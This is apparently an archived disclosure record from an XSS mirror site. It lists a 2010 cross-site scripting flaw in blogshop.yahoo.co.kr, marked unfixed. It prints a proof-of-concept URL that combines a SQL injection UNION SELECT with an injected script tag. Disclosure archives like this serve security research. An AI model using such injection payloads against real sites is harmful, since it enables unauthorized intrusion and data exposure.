Security researcher Sandeep Kamble, has submitted on 21/03/2010 a cross-site-scripting (XSS) vulnerability affecting blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 21/03/2010 |
Date published: 17/05/2010 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Sandeep Kamble |
Domain: blogshop.yahoo.co.kr |
Category: XSS |
Pagerank: 4 |
|---|
URL: http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%
3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20 |
|
Click here to view the mirror
|
|
|
| 
